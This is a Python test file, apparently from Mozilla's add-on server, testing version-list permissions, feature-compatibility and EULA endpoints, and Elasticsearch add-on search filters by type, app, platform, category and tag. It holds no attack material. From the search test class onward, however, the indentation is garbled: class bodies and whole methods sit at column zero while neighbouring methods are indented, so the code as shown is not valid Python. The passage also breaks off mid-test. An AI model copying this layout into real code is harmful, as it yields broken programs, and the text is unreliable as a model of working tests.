    def test_unlisted_version_unlisted_reviewer(self):
        user = UserProfile.objects.create(username='reviewer')
        self.grant_permission(user, 'Addons:ReviewUnlisted')
        self.client.login_api(user)
        self.version.update(channel=amo.RELEASE_CHANNEL_UNLISTED)
        self._test_url()

    def test_unlisted_version_author(self):
        user = UserProfile.objects.create(username='author')
        AddonUser.objects.create(user=user, addon=self.addon)
        self.client.login_api(user)
        self.version.update(channel=amo.RELEASE_CHANNEL_UNLISTED)
        self._test_url()

    def test_unlisted_version_admin(self):
        user = UserProfile.objects.create(username='admin')
        self.grant_permission(user, '*:*')
        self.client.login_api(user)
        self.version.update(channel=amo.RELEASE_CHANNEL_UNLISTED)
        self._test_url()

    def test_unlisted_version_anonymous(self):
        self.version.update(channel=amo.RELEASE_CHANNEL_UNLISTED)
        response = self.client.get(self.url)
        assert response.status_code == 401

    def test_unlisted_version_user_but_not_author(self):
        user = UserProfile.objects.create(username='simpleuser')
        self.client.login_api(user)
        self.version.update(channel=amo.RELEASE_CHANNEL_UNLISTED)
        response = self.client.get(self.url)
        assert response.status_code == 403
class TestVersionViewSetList(AddonAndVersionViewSetDetailMixin, TestCase):
    """List endpoint tests for the versions of an add-on.

    Checks which versions (disabled, deleted, unlisted) are returned to
    each kind of user, with and without the `filter` query parameter.
    """
    client_class = APITestClient

    def setUp(self):
        super(TestVersionViewSetList, self).setUp()
        self.addon = addon_factory(
            guid=generate_addon_guid(), name=u'My Addôn', slug='my-addon')
        self.old_version = self.addon.current_version
        self.old_version.update(created=self.days_ago(2))

        # Don't use addon.current_version, changing its state as we do in
        # the tests might render the add-on itself inaccessible.
        self.version = version_factory(addon=self.addon, version='1.0.1')
        self.version.update(created=self.days_ago(1))

        # This version is unlisted and should be hidden by default, only
        # shown when requesting to see unlisted stuff explicitly, with the
        # right permissions.
        self.unlisted_version = version_factory(
            addon=self.addon, version='42.0',
            channel=amo.RELEASE_CHANNEL_UNLISTED)

        self._set_tested_url(self.addon.pk)

    def _test_url(self, **kwargs):
        # Expect the two listed versions, newest first.
        response = self.client.get(self.url, data=kwargs)
        assert response.status_code == 200
        result = json.loads(response.content)
        assert result['results']
        assert len(result['results']) == 2
        result_version = result['results'][0]
        assert result_version['id'] == self.version.pk
        assert result_version['version'] == self.version.version
        result_version = result['results'][1]
        assert result_version['id'] == self.old_version.pk
        assert result_version['version'] == self.old_version.version

    def _test_url_contains_all(self, **kwargs):
        # Expect all three versions, including the unlisted one.
        response = self.client.get(self.url, data=kwargs)
        assert response.status_code == 200
        result = json.loads(response.content)
        assert result['results']
        assert len(result['results']) == 3
        result_version = result['results'][0]
        assert result_version['id'] == self.unlisted_version.pk
        assert result_version['version'] == self.unlisted_version.version
        result_version = result['results'][1]
        assert result_version['id'] == self.version.pk
        assert result_version['version'] == self.version.version
        result_version = result['results'][2]
        assert result_version['id'] == self.old_version.pk
        assert result_version['version'] == self.old_version.version

    def _test_url_only_contains_old_version(self, **kwargs):
        # Expect only the remaining public listed version.
        response = self.client.get(self.url, data=kwargs)
        assert response.status_code == 200
        result = json.loads(response.content)
        assert result['results']
        assert len(result['results']) == 1
        result_version = result['results'][0]
        assert result_version['id'] == self.old_version.pk
        assert result_version['version'] == self.old_version.version

    def _set_tested_url(self, param):
        self.url = reverse_ns('addon-version-list', kwargs={'addon_pk': param})

    def test_bad_filter(self):
        response = self.client.get(self.url, data={'filter': 'ahahaha'})
        assert response.status_code == 400
        data = json.loads(response.content)
        assert data == ['Invalid "filter" parameter specified.']

    def test_disabled_version_reviewer(self):
        user = UserProfile.objects.create(username='reviewer')
        self.grant_permission(user, 'Addons:Review')
        self.client.login_api(user)
        self.version.files.update(status=amo.STATUS_DISABLED)
        self._test_url_only_contains_old_version()

        # A reviewer can see disabled versions when explicitly asking for them.
        self._test_url(filter='all_without_unlisted')

    def test_disabled_version_author(self):
        user = UserProfile.objects.create(username='author')
        AddonUser.objects.create(user=user, addon=self.addon)
        self.client.login_api(user)
        self.version.files.update(status=amo.STATUS_DISABLED)
        self._test_url_only_contains_old_version()

        # An author can see disabled versions when explicitly asking for them.
        self._test_url(filter='all_without_unlisted')

    def test_disabled_version_admin(self):
        user = UserProfile.objects.create(username='admin')
        self.grant_permission(user, '*:*')
        self.client.login_api(user)
        self.version.files.update(status=amo.STATUS_DISABLED)
        self._test_url_only_contains_old_version()

        # An admin can see disabled versions when explicitly asking for them.
        self._test_url(filter='all_without_unlisted')

    def test_disabled_version_anonymous(self):
        # Anonymous users only see the public list; the explicit filters
        # require authentication (401).
        self.version.files.update(status=amo.STATUS_DISABLED)
        self._test_url_only_contains_old_version()
        response = self.client.get(
            self.url, data={'filter': 'all_without_unlisted'})
        assert response.status_code == 401
        response = self.client.get(
            self.url, data={'filter': 'all_with_deleted'})
        assert response.status_code == 401

    def test_disabled_version_user_but_not_author(self):
        # A logged-in non-author may not use the privileged filters (403).
        user = UserProfile.objects.create(username='simpleuser')
        self.client.login_api(user)
        self.version.files.update(status=amo.STATUS_DISABLED)
        self._test_url_only_contains_old_version()
        response = self.client.get(
            self.url, data={'filter': 'all_without_unlisted'})
        assert response.status_code == 403
        response = self.client.get(
            self.url, data={'filter': 'all_with_deleted'})
        assert response.status_code == 403

    def test_deleted_version_reviewer(self):
        user = UserProfile.objects.create(username='reviewer')
        self.grant_permission(user, 'Addons:Review')
        self.client.login_api(user)
        self.version.delete()
        self._test_url_only_contains_old_version()
        self._test_url_only_contains_old_version(filter='all_without_unlisted')
        response = self.client.get(
            self.url, data={'filter': 'all_with_deleted'})
        assert response.status_code == 403
        response = self.client.get(
            self.url, data={'filter': 'all_with_unlisted'})
        assert response.status_code == 403

    def test_deleted_version_author(self):
        user = UserProfile.objects.create(username='author')
        AddonUser.objects.create(user=user, addon=self.addon)
        self.client.login_api(user)
        self.version.delete()
        self._test_url_only_contains_old_version()
        self._test_url_only_contains_old_version(filter='all_without_unlisted')
        response = self.client.get(
            self.url, data={'filter': 'all_with_deleted'})
        assert response.status_code == 403

    def test_deleted_version_admin(self):
        user = UserProfile.objects.create(username='admin')
        self.grant_permission(user, '*:*')
        self.client.login_api(user)
        self.version.delete()
        self._test_url_only_contains_old_version()
        self._test_url_only_contains_old_version(filter='all_without_unlisted')

        # An admin can see deleted versions when explicitly asking
        # for them.
        self._test_url_contains_all(filter='all_with_deleted')

    def test_all_with_unlisted_admin(self):
        user = UserProfile.objects.create(username='admin')
        self.grant_permission(user, '*:*')
        self.client.login_api(user)
        self._test_url_contains_all(filter='all_with_unlisted')

    def test_with_unlisted_unlisted_reviewer(self):
        user = UserProfile.objects.create(username='reviewer')
        self.grant_permission(user, 'Addons:ReviewUnlisted')
        self.client.login_api(user)
        self._test_url_contains_all(filter='all_with_unlisted')

    def test_with_unlisted_author(self):
        user = UserProfile.objects.create(username='author')
        AddonUser.objects.create(user=user, addon=self.addon)
        self.client.login_api(user)
        self._test_url_contains_all(filter='all_with_unlisted')

    def test_deleted_version_anonymous(self):
        self.version.delete()
        self._test_url_only_contains_old_version()

        response = self.client.get(
            self.url, data={'filter': 'all_with_deleted'})
        assert response.status_code == 401

    def test_all_without_and_with_unlisted_anonymous(self):
        response = self.client.get(
            self.url, data={'filter': 'all_without_unlisted'})
        assert response.status_code == 401
        response = self.client.get(
            self.url, data={'filter': 'all_with_unlisted'})
        assert response.status_code == 401

    def test_deleted_version_user_but_not_author(self):
        user = UserProfile.objects.create(username='simpleuser')
        self.client.login_api(user)
        self.version.delete()
        self._test_url_only_contains_old_version()

        response = self.client.get(
            self.url, data={'filter': 'all_with_deleted'})
        assert response.status_code == 403

    def test_all_without_and_with_unlisted_user_but_not_author(self):
        user = UserProfile.objects.create(username='simpleuser')
        self.client.login_api(user)
        self.version.delete()
        response = self.client.get(
            self.url, data={'filter': 'all_without_unlisted'})
        assert response.status_code == 403
        response = self.client.get(
            self.url, data={'filter': 'all_with_unlisted'})
        assert response.status_code == 403
class TestAddonViewSetFeatureCompatibility(TestCase):
    """Tests for the add-on feature-compatibility sub-endpoint."""
    client_class = APITestClient

    def setUp(self):
        super(TestAddonViewSetFeatureCompatibility, self).setUp()
        self.addon = addon_factory(
            guid=generate_addon_guid(), name=u'My Addôn', slug='my-addon')
        self.url = reverse_ns(
            'addon-feature-compatibility', kwargs={'pk': self.addon.pk})

    def test_url(self):
        # The endpoint hangs off the detail URL.
        self.detail_url = reverse_ns(
            'addon-detail', kwargs={'pk': self.addon.pk})
        assert self.url == self.detail_url + 'feature_compatibility/'

    def test_disabled_anonymous(self):
        self.addon.update(disabled_by_user=True)
        assert self.client.get(self.url).status_code == 401

    def test_feature_compatibility_unknown(self):
        # No AddonFeatureCompatibility row -> e10s reported as 'unknown'.
        response = self.client.get(self.url)
        assert response.status_code == 200
        payload = json.loads(response.content)
        assert payload['e10s'] == 'unknown'

    def test_feature_compatibility_compatible(self):
        AddonFeatureCompatibility.objects.create(
            addon=self.addon, e10s=amo.E10S_COMPATIBLE)
        response = self.client.get(self.url)
        assert response.status_code == 200
        payload = json.loads(response.content)
        assert payload['e10s'] == 'compatible'
class TestAddonViewSetEulaPolicy(TestCase):
    """Tests for the add-on eula_policy sub-endpoint."""
    client_class = APITestClient

    def setUp(self):
        super(TestAddonViewSetEulaPolicy, self).setUp()
        self.addon = addon_factory(
            guid=generate_addon_guid(), name=u'My Addôn', slug='my-addon')
        self.url = reverse_ns(
            'addon-eula-policy', kwargs={'pk': self.addon.pk})

    def test_url(self):
        # The endpoint hangs off the detail URL.
        self.detail_url = reverse_ns(
            'addon-detail', kwargs={'pk': self.addon.pk})
        assert self.url == self.detail_url + 'eula_policy/'

    def test_disabled_anonymous(self):
        self.addon.update(disabled_by_user=True)
        assert self.client.get(self.url).status_code == 401

    def test_policy_none(self):
        # Neither field set: both serialize as null.
        response = self.client.get(self.url)
        assert response.status_code == 200
        payload = json.loads(response.content)
        assert payload['eula'] is None
        assert payload['privacy_policy'] is None

    def test_policy(self):
        self.addon.eula = {'en-US': u'My Addôn EULA', 'fr': u'Hoüla'}
        self.addon.privacy_policy = u'My Prïvacy, My Policy'
        self.addon.save()
        response = self.client.get(self.url)
        assert response.status_code == 200
        payload = json.loads(response.content)
        assert payload['eula'] == {'en-US': u'My Addôn EULA', 'fr': u'Hoüla'}
        assert payload['privacy_policy'] == {'en-US': u'My Prïvacy, My Policy'}
class TestAddonSearchView(ESTestCase):
client_class = APITestClient
fixtures = ['base/users']
def setUp(self):
    super(TestAddonSearchView, self).setUp()
    # All tests in this class hit the public search endpoint.
    self.url = reverse_ns('addon-search')
def tearDown(self):
    super(TestAddonSearchView, self).tearDown()
    # Wipe the ES index so documents don't leak between tests.
    self.empty_index('default')
    self.refresh()
def test_get_queryset_excludes(self):
    """The ES queryset must exclude heavy/boost-only fields from
    `_source` in the returned hits."""
    addon_factory(slug='my-addon', name=u'My Addôn', weekly_downloads=666)
    addon_factory(slug='my-second-addon', name=u'My second Addôn',
                  weekly_downloads=555)
    self.refresh()

    view = AddonSearchView()
    view.request = APIRequestFactory().get('/')
    qset = view.get_queryset()

    # The serialized query should ask ES to drop these from _source.
    assert set(qset.to_dict()['_source']['excludes']) == set(
        ('*.raw', 'boost', 'hotness', 'name', 'description',
         'name_l10n_*', 'description_l10n_*', 'summary', 'summary_l10n_*')
    )

    response = qset.execute()

    source_keys = response.hits.hits[0]['_source'].keys()

    # TODO: 'name', 'description', 'hotness' and 'summary' are in there...
    # for some reason I don't yet understand... (cgrebs 0717)
    # maybe because they're used for boosting or filtering or so?
    assert not any(key in source_keys for key in (
        'boost',
    ))

    assert not any(
        key.startswith('name_l10n_') for key in source_keys
    )

    assert not any(
        key.startswith('description_l10n_') for key in source_keys
    )

    assert not any(
        key.startswith('summary_l10n_') for key in source_keys
    )
def perform_search(self, url, data=None, expected_status=200, **headers):
    """GET `url` with `data` as querystring parameters, assert the
    response status is `expected_status`, and return the parsed JSON
    body.

    Also asserts that zero SQL queries were made: search results must
    come entirely from ElasticSearch.
    """
    # Just to cache the waffle switch, to avoid polluting the
    # assertNumQueries() call later.
    waffle.switch_is_active('boost-webextensions-in-search')

    with self.assertNumQueries(0):
        response = self.client.get(url, data, **headers)
    assert response.status_code == expected_status, response.content
    # Use a distinct name for the payload rather than shadowing the
    # `data` parameter, which made the function confusing to read.
    payload = json.loads(response.content)
    return payload
def test_basic(self):
    """An unqueried search returns all public add-ons; the fixtures only
    differ by weekly_downloads and the higher one is asserted first."""
    addon = addon_factory(slug='my-addon', name=u'My Addôn',
                          weekly_downloads=666)
    addon2 = addon_factory(slug='my-second-addon', name=u'My second Addôn',
                           weekly_downloads=555)
    self.refresh()

    data = self.perform_search(self.url)  # No query.
    assert data['count'] == 2
    assert len(data['results']) == 2

    result = data['results'][0]
    assert result['id'] == addon.pk
    assert result['name'] == {'en-US': u'My Addôn'}
    assert result['slug'] == 'my-addon'
    assert result['last_updated'] == (
        addon.last_updated.replace(microsecond=0).isoformat() + 'Z')

    # latest_unlisted_version should never be exposed in public search.
    assert 'latest_unlisted_version' not in result

    result = data['results'][1]
    assert result['id'] == addon2.pk
    assert result['name'] == {'en-US': u'My second Addôn'}
    assert result['slug'] == 'my-second-addon'

    # latest_unlisted_version should never be exposed in public search.
    assert 'latest_unlisted_version' not in result
def test_empty(self):
    """With nothing indexed the search returns zero results."""
    payload = self.perform_search(self.url)
    assert payload['count'] == 0
    assert len(payload['results']) == 0
def test_es_queries_made_no_results(self):
    # A search with no hits should still issue exactly one ES query.
    with patch.object(
            Elasticsearch, 'search',
            wraps=amo.search.get_es().search) as search_mock:
        data = self.perform_search(self.url, data={'q': 'foo'})
        assert data['count'] == 0
        assert len(data['results']) == 0
        assert search_mock.call_count == 1
def test_es_queries_made_some_result(self):
    # Even a paginated search with hits should issue only one ES query.
    addon_factory(slug='foormidable', name=u'foo')
    addon_factory(slug='foobar', name=u'foo')
    self.refresh()

    with patch.object(
            Elasticsearch, 'search',
            wraps=amo.search.get_es().search) as search_mock:
        data = self.perform_search(
            self.url, data={'q': 'foo', 'page_size': 1})
        assert data['count'] == 2
        assert len(data['results']) == 1
        assert search_mock.call_count == 1
def test_no_unlisted(self):
    """An add-on whose only version is unlisted never shows up in
    public search results."""
    addon_factory(slug='my-addon', name=u'My Addôn',
                  status=amo.STATUS_NULL,
                  weekly_downloads=666,
                  version_kw={'channel': amo.RELEASE_CHANNEL_UNLISTED})
    self.refresh()
    payload = self.perform_search(self.url)
    assert payload['count'] == 0
    assert len(payload['results']) == 0
def test_pagination(self):
    """`page_size` limits results and the `next` URL fetches page two."""
    addon = addon_factory(slug='my-addon', name=u'My Addôn',
                          weekly_downloads=33)
    addon2 = addon_factory(slug='my-second-addon', name=u'My second Addôn',
                           weekly_downloads=22)
    addon_factory(slug='my-third-addon', name=u'My third Addôn',
                  weekly_downloads=11)
    self.refresh()

    data = self.perform_search(self.url, {'page_size': 1})
    assert data['count'] == 3
    assert len(data['results']) == 1

    result = data['results'][0]
    assert result['id'] == addon.pk
    assert result['name'] == {'en-US': u'My Addôn'}
    assert result['slug'] == 'my-addon'

    # Search using the second page URL given in return value.
    data = self.perform_search(data['next'])
    assert data['count'] == 3
    assert len(data['results']) == 1

    result = data['results'][0]
    assert result['id'] == addon2.pk
    assert result['name'] == {'en-US': u'My second Addôn'}
    assert result['slug'] == 'my-second-addon'
def test_pagination_sort_and_query(self):
    """The `sort` and `q` parameters are carried through the pagination
    links (`next`/`previous`)."""
    addon_factory(slug='my-addon', name=u'Cy Addôn')
    addon2 = addon_factory(slug='my-second-addon', name=u'By second Addôn')
    addon1 = addon_factory(slug='my-first-addon', name=u'Ay first Addôn')
    addon_factory(slug='only-happy-when-itrains', name=u'Garbage')
    self.refresh()

    data = self.perform_search(self.url, {
        'page_size': 1, 'q': u'addôn', 'sort': 'name'})
    assert data['count'] == 3
    assert len(data['results']) == 1

    result = data['results'][0]
    assert result['id'] == addon1.pk
    assert result['name'] == {'en-US': u'Ay first Addôn'}

    # Search using the second page URL given in return value.
    assert 'sort=name' in data['next']
    data = self.perform_search(data['next'])
    assert data['count'] == 3
    assert len(data['results']) == 1
    assert 'sort=name' in data['previous']

    result = data['results'][0]
    assert result['id'] == addon2.pk
    assert result['name'] == {'en-US': u'By second Addôn'}
def test_filtering_only_reviewed_addons(self):
    """Only public add-ons appear: incomplete, disabled, unlisted-only
    and user-disabled add-ons are all filtered out."""
    public_addon = addon_factory(slug='my-addon', name=u'My Addôn',
                                 weekly_downloads=222)
    addon_factory(slug='my-incomplete-addon', name=u'My incomplete Addôn',
                  status=amo.STATUS_NULL)
    addon_factory(slug='my-disabled-addon', name=u'My disabled Addôn',
                  status=amo.STATUS_DISABLED)
    addon_factory(slug='my-unlisted-addon', name=u'My unlisted Addôn',
                  version_kw={'channel': amo.RELEASE_CHANNEL_UNLISTED})
    addon_factory(slug='my-disabled-by-user-addon',
                  name=u'My disabled by user Addôn',
                  disabled_by_user=True)
    self.refresh()

    data = self.perform_search(self.url)
    assert data['count'] == 1
    assert len(data['results']) == 1

    result = data['results'][0]
    assert result['id'] == public_addon.pk
    assert result['name'] == {'en-US': u'My Addôn'}
    assert result['slug'] == 'my-addon'
def test_with_query(self):
    """A text query only matches the relevant add-on."""
    addon = addon_factory(slug='my-addon', name=u'My Addon',
                          tags=['some_tag'])
    addon_factory(slug='unrelated', name=u'Unrelated')
    self.refresh()

    payload = self.perform_search(self.url, {'q': 'addon'})
    assert payload['count'] == 1
    assert len(payload['results']) == 1

    hit = payload['results'][0]
    assert hit['id'] == addon.pk
    assert hit['name'] == {'en-US': u'My Addon'}
    assert hit['slug'] == 'my-addon'
def test_with_session_cookie(self):
    # Session cookie should be ignored, therefore a request with it should
    # not cause more database queries.
    self.client.login(email='regular@mozilla.com')
    payload = self.perform_search(self.url)
    assert payload['count'] == 0
    assert len(payload['results']) == 0
def test_filter_by_type(self):
    """The `type` parameter filters by add-on type and accepts a
    comma-separated list of types."""
    addon = addon_factory(slug='my-addon', name=u'My Addôn')
    theme = addon_factory(slug='my-theme', name=u'My Thème',
                          type=amo.ADDON_THEME)
    addon_factory(slug='my-search', name=u'My Seárch',
                  type=amo.ADDON_SEARCH)
    self.refresh()

    data = self.perform_search(self.url, {'type': 'extension'})
    assert data['count'] == 1
    assert len(data['results']) == 1
    assert data['results'][0]['id'] == addon.pk

    data = self.perform_search(self.url, {'type': 'theme'})
    assert data['count'] == 1
    assert len(data['results']) == 1
    assert data['results'][0]['id'] == theme.pk

    # Multiple types, comma-separated.
    data = self.perform_search(self.url, {'type': 'theme,extension'})
    assert data['count'] == 2
    assert len(data['results']) == 2
    result_ids = (data['results'][0]['id'], data['results'][1]['id'])
    assert sorted(result_ids) == [addon.pk, theme.pk]
@patch('olympia.addons.models.get_featured_ids')
def test_filter_by_featured_no_app_no_lang(self, get_featured_ids_mock):
    # Without app/lang, `featured=true` relies on get_featured_ids()
    # (mocked here) to decide which add-ons are featured.
    addon = addon_factory(slug='my-addon', name=u'Featured Addôn')
    addon_factory(slug='other-addon', name=u'Other Addôn')
    get_featured_ids_mock.return_value = [addon.pk]
    assert addon.is_featured()
    self.reindex(Addon)

    data = self.perform_search(self.url, {'featured': 'true'})
    assert data['count'] == 1
    assert len(data['results']) == 1
    assert data['results'][0]['id'] == addon.pk
def test_filter_by_featured_app_and_langs(self):
    """`featured=true` combined with `app` and/or `lang` narrows results
    to the matching featured collections."""
    # One featured collection per (application, locale) combination.
    fx_addon = addon_factory(slug='my-addon', name=u'Featured Addôn')
    collection = collection_factory()
    FeaturedCollection.objects.create(
        collection=collection, application=amo.FIREFOX.id)
    collection.add_addon(fx_addon)

    fx_fr_addon = addon_factory(slug='my-addon', name=u'Lé Featured Addôn')
    collection = collection_factory()
    FeaturedCollection.objects.create(
        collection=collection, application=amo.FIREFOX.id, locale='fr')
    collection.add_addon(fx_fr_addon)

    fn_addon = addon_factory(slug='my-addon', name=u'Featured Addôn 2 go')
    collection = collection_factory()
    FeaturedCollection.objects.create(
        collection=collection, application=amo.ANDROID.id)
    collection.add_addon(fn_addon)

    fn_fr_addon = addon_factory(slug='my-addon', name=u'Lé Featured Mobil')
    collection = collection_factory()
    FeaturedCollection.objects.create(
        collection=collection, application=amo.ANDROID.id, locale='fr')
    collection.add_addon(fn_fr_addon)

    addon_factory(slug='other-addon', name=u'Other Addôn')
    self.reindex(Addon)

    # Searching for just Firefox should return the two Firefox collections.
    # The filter should be `Q('term', **{'featured_for.application': app})`
    data = self.perform_search(self.url, {'featured': 'true',
                                          'app': 'firefox'})
    assert data['count'] == 2 == len(data['results'])
    ids = {data['results'][0]['id'], data['results'][1]['id']}
    self.assertSetEqual(ids, {fx_addon.pk, fx_fr_addon.pk})

    # If we specify lang 'fr' too it should be the same collections.
    # In addition to the app query above, this will be executed too:
    # `Q('terms', **{'featured_for.locales': [locale, 'ALL']}))`
    data = self.perform_search(
        self.url, {'featured': 'true', 'app': 'firefox', 'lang': 'fr'})
    assert data['count'] == 2 == len(data['results'])
    ids = {data['results'][0]['id'], data['results'][1]['id']}
    self.assertSetEqual(ids, {fx_addon.pk, fx_fr_addon.pk})

    # But 'en-US' will exclude the 'fr' collection.
    data = self.perform_search(
        self.url, {'featured': 'true', 'app': 'firefox',
                   'lang': 'en-US'})
    assert data['count'] == 1 == len(data['results'])
    assert data['results'][0]['id'] == fx_addon.pk

    # If we only search for lang, application is ignored.
    # Just `Q('terms', **{'featured_for.locales': [locale, 'ALL']}))` now.
    data = self.perform_search(
        self.url, {'featured': 'true', 'lang': 'en-US'})
    assert data['count'] == 2 == len(data['results'])
    ids = {data['results'][0]['id'], data['results'][1]['id']}
    self.assertSetEqual(ids, {fx_addon.pk, fn_addon.pk})

    data = self.perform_search(
        self.url, {'featured': 'true', 'lang': 'fr'})
    assert data['count'] == 4 == len(data['results'])
    ids = {data['results'][0]['id'], data['results'][1]['id'],
           data['results'][2]['id'], data['results'][3]['id']}
    self.assertSetEqual(
        ids, {fx_addon.pk, fx_fr_addon.pk, fn_addon.pk, fn_fr_addon.pk})
def test_filter_by_platform(self):
    """`platform=mac` keeps all-platform and mac-only add-ons, and drops
    add-ons restricted to other platforms."""
    # First add-on is available for all platforms.
    addon = addon_factory(slug='my-addon', name=u'My Addôn',
                          weekly_downloads=33)
    addon_factory(
        slug='my-linux-addon', name=u'My linux-only Addön',
        file_kw={'platform': amo.PLATFORM_LINUX.id},
        weekly_downloads=22)
    mac_addon = addon_factory(
        slug='my-mac-addon', name=u'My mac-only Addön',
        file_kw={'platform': amo.PLATFORM_MAC.id},
        weekly_downloads=11)
    self.refresh()

    # Without a platform filter, everything shows up.
    data = self.perform_search(self.url)
    assert data['count'] == 3
    assert len(data['results']) == 3
    assert data['results'][0]['id'] == addon.pk

    data = self.perform_search(self.url, {'platform': 'mac'})
    assert data['count'] == 2
    assert len(data['results']) == 2
    assert data['results'][0]['id'] == addon.pk
    assert data['results'][1]['id'] == mac_addon.pk
def test_filter_by_app(self):
    """`app` filters by compatible application; an add-on compatible with
    both applications appears in both result sets."""
    addon = addon_factory(
        slug='my-addon', name=u'My Addôn', weekly_downloads=33,
        version_kw={'min_app_version': '42.0',
                    'max_app_version': '*'})
    tb_addon = addon_factory(
        slug='my-tb-addon', name=u'My TBV Addøn', weekly_downloads=22,
        version_kw={'application': amo.THUNDERBIRD.id,
                    'min_app_version': '42.0',
                    'max_app_version': '*'})
    both_addon = addon_factory(
        slug='my-both-addon', name=u'My Both Addøn', weekly_downloads=11,
        version_kw={'min_app_version': '43.0',
                    'max_app_version': '*'})
    # both_addon was created with firefox compatibility, manually add
    # thunderbird, making it compatible with both.
    ApplicationsVersions.objects.create(
        application=amo.THUNDERBIRD.id, version=both_addon.current_version,
        min=AppVersion.objects.create(
            application=amo.THUNDERBIRD.id, version='43.0'),
        max=AppVersion.objects.get(
            application=amo.THUNDERBIRD.id, version='*'))
    # Because the manually created ApplicationsVersions was created after
    # the initial save, we need to reindex and not just refresh.
    self.reindex(Addon)

    data = self.perform_search(self.url, {'app': 'firefox'})
    assert data['count'] == 2
    assert len(data['results']) == 2
    assert data['results'][0]['id'] == addon.pk
    assert data['results'][1]['id'] == both_addon.pk

    data = self.perform_search(self.url, {'app': 'thunderbird'})
    assert data['count'] == 2
    assert len(data['results']) == 2
    assert data['results'][0]['id'] == tb_addon.pk
    assert data['results'][1]['id'] == both_addon.pk
    def test_filter_by_appversion(self):
        """Combining ?app= and ?appversion= filters by compatibility range.

        e.g. '46.0' matches add-ons whose range is 42.0-* and 43.0-*, but
        '42.0' excludes both_addon (whose min for Firefox is 43.0).
        """
        addon = addon_factory(
            slug='my-addon', name=u'My Addôn', weekly_downloads=33,
            version_kw={'min_app_version': '42.0',
                        'max_app_version': '*'})
        tb_addon = addon_factory(
            slug='my-tb-addon', name=u'My TBV Addøn', weekly_downloads=22,
            version_kw={'application': amo.THUNDERBIRD.id,
                        'min_app_version': '42.0',
                        'max_app_version': '*'})
        both_addon = addon_factory(
            slug='my-both-addon', name=u'My Both Addøn', weekly_downloads=11,
            version_kw={'min_app_version': '43.0',
                        'max_app_version': '*'})
        # both_addon was created with firefox compatibility, manually add
        # thunderbird, making it compatible with both.
        ApplicationsVersions.objects.create(
            application=amo.THUNDERBIRD.id, version=both_addon.current_version,
            min=AppVersion.objects.create(
                application=amo.THUNDERBIRD.id, version='43.0'),
            max=AppVersion.objects.get(
                application=amo.THUNDERBIRD.id, version='*'))
        # Because the manually created ApplicationsVersions was created after
        # the initial save, we need to reindex and not just refresh.
        self.reindex(Addon)
        data = self.perform_search(self.url, {'app': 'firefox',
                                              'appversion': '46.0'})
        assert data['count'] == 2
        assert len(data['results']) == 2
        assert data['results'][0]['id'] == addon.pk
        assert data['results'][1]['id'] == both_addon.pk
        data = self.perform_search(self.url, {'app': 'thunderbird',
                                              'appversion': '43.0.1'})
        assert data['count'] == 2
        assert len(data['results']) == 2
        assert data['results'][0]['id'] == tb_addon.pk
        assert data['results'][1]['id'] == both_addon.pk
        # 42.0 is below both_addon's Firefox minimum of 43.0.
        data = self.perform_search(self.url, {'app': 'firefox',
                                              'appversion': '42.0'})
        assert data['count'] == 1
        assert len(data['results']) == 1
        assert data['results'][0]['id'] == addon.pk
        # 42.0.1 is below both_addon's Thunderbird minimum of 43.0.
        data = self.perform_search(self.url, {'app': 'thunderbird',
                                              'appversion': '42.0.1'})
        assert data['count'] == 1
        assert len(data['results']) == 1
        assert data['results'][0]['id'] == tb_addon.pk
def test_filter_by_category(self):
static_category = (
CATEGORIES[amo.FIREFOX.id][amo.ADDON_EXTENSION]['alerts-updates'])
category = Category.from_static_category(static_category, True)
addon = addon_factory(
slug='my-addon', name=u'My Addôn', category=category)
self.refresh()
# Create an add-on in a different category.
static_category = (
CATEGORIES[amo.FIREFOX.id][amo.ADDON_EXTENSION]['tabs'])
other_category = Category.from_static_category(static_category, True)
addon_factory(slug='different-addon', category=other_category)
self.refresh()
# Search for add-ons in the first category. There should be only one.
data = self.perform_search(self.url, {'app': 'firefox',
'type': 'extension',
'category': category.slug})
assert data['count'] == 1
assert len(data['results']) == 1
assert data['results'][0]['id'] == addon.pk
    def test_filter_by_category_multiple_types(self):
        """A category slug shared by several add-on types matches all of
        them when ?type= lists multiple types (persona + statictheme)."""
        def get_category(type_, name):
            # Small helper: look up the static category and persist it.
            static_category = (
                CATEGORIES[amo.FIREFOX.id][type_][name])
            return Category.from_static_category(static_category, True)
        addon_lwt = addon_factory(
            slug='my-addon-lwt', name=u'My Addôn LWT',
            category=get_category(amo.ADDON_PERSONA, 'holiday'),
            type=amo.ADDON_PERSONA)
        addon_st = addon_factory(
            slug='my-addon-st', name=u'My Addôn ST',
            category=get_category(amo.ADDON_STATICTHEME, 'holiday'),
            type=amo.ADDON_STATICTHEME)
        self.refresh()
        # Create some add-ons in a different category.
        addon_factory(
            slug='different-addon-lwt', name=u'Diff Addôn LWT',
            category=get_category(amo.ADDON_PERSONA, 'sports'),
            type=amo.ADDON_PERSONA)
        addon_factory(
            slug='different-addon-st', name=u'Diff Addôn ST',
            category=get_category(amo.ADDON_STATICTHEME, 'sports'),
            type=amo.ADDON_STATICTHEME)
        self.refresh()
        # Search for add-ons in the first category. There should be two.
        data = self.perform_search(self.url, {'app': 'firefox',
                                              'type': 'persona,statictheme',
                                              'category': 'holiday'})
        assert data['count'] == 2
        assert len(data['results']) == 2
        # Ordering between the two is not asserted, only membership.
        result_ids = (data['results'][0]['id'], data['results'][1]['id'])
        assert sorted(result_ids) == [addon_lwt.pk, addon_st.pk]
    def test_filter_with_tags(self):
        """Filtering by ?tag= returns only tagged add-ons; a comma-separated
        list of tags requires ALL of them (AND semantics)."""
        addon = addon_factory(slug='my-addon', name=u'My Addôn',
                              tags=['some_tag'], weekly_downloads=999)
        addon2 = addon_factory(slug='another-addon', name=u'Another Addôn',
                               tags=['unique_tag', 'some_tag'],
                               weekly_downloads=333)
        addon3 = addon_factory(slug='unrelated', name=u'Unrelated',
                               tags=['unrelated'])
        self.refresh()
        data = self.perform_search(self.url, {'tag': 'some_tag'})
        assert data['count'] == 2
        assert len(data['results']) == 2
        result = data['results'][0]
        assert result['id'] == addon.pk
        assert result['slug'] == addon.slug
        assert result['tags'] == ['some_tag']
        result = data['results'][1]
        assert result['id'] == addon2.pk
        assert result['slug'] == addon2.slug
        assert result['tags'] == ['some_tag', 'unique_tag']
        data = self.perform_search(self.url, {'tag': 'unrelated'})
        assert data['count'] == 1
        assert len(data['results']) == 1
        result = data['results'][0]
        assert result['id'] == addon3.pk
        assert result['slug'] == addon3.slug
        assert result['tags'] == ['unrelated']
        # Multiple tags: only addon2 carries both, so addon is excluded.
        data = self.perform_search(self.url, {'tag': 'unique_tag,some_tag'})
        assert data['count'] == 1
        assert len(data['results']) == 1
